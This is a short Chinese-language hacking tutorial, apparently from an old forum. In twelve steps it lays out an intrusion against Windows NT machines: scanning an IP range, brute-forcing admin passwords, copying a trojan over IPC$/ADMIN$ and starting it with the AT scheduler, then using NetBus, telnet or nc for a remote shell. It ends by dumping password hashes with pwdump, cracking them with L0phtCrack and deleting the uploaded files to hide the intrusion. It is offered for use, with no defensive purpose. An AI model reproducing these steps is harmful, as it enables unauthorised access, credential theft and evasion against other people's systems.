1 本方法要有以下几个工具:PINGER;LETMEIN;NTSRV;NETSVC;PWDDUMP;NC;L0PHTCRACK
2 开始,用PINGER查一个IP段,找到目标,并选定
3 进入DOS,利用LETMEIN
C:\>LETMEIN \\IP -ADMIN -D MYPWD
探测该网站的USER和PASSWD,如没有,试其它网站,你总会找到几个笨蛋的,我们这里以USER=KAWE PASSWD=KAWEN为准
4 进入IPC连接
C:\>NET USE \\IP\IPC$ :"hack50"/USER:"hack50"
5 进去后,COPY工具进去 NTSRV;NETSVC;PWDDUMP
方法:COPY C:\HACK2\NTSRV.EXE \\IP\ADMIN$\SYSTEM32
6 启动木马程序(NESRV.EXE)并监听64321端口.
C:\>NETSVC \\IP SCHEDULE /START (启动SCHEDULE)
C:\>AT \\IP 13:00 NTSRV.EXE /PORT:64321 |NOMSG
(SCHEDULE启动NTSRV.EXE并监听64321)
7.成功.启动木马客户端(NETBUS)在HOSTNAME/IP中填入IP,在PORT中填入64321,选CONNECT.
8选项GETINFO 会反回一个消息,可以看到NT在对方的C盘中的WINNT
9 选APPREDIRECT,我们要利用它的CMD.EXE,弹出的窗口填入
C:\>C:\WINNT\SYSTEM32\CMD.EXE
PORT:64321
10 我们可以利用TELNET和NC二种方式来控制
TELNET IP 64321
NC IP 64321
并用NET VIEW看共享
11 在TELNET或 NC方式中运行PWDDUMP.EXE,利用NETBUS将SERVER.LC拉下来,并用L0PHTCRACK来解密
C:\>WINNT>SYSTEM32>PWDDUMMP >SERVER.LC 用L0PHTCRACK解密码
12 得到PASSWD做什么随便你,别忘了X掉你上传到他机子上的FILE.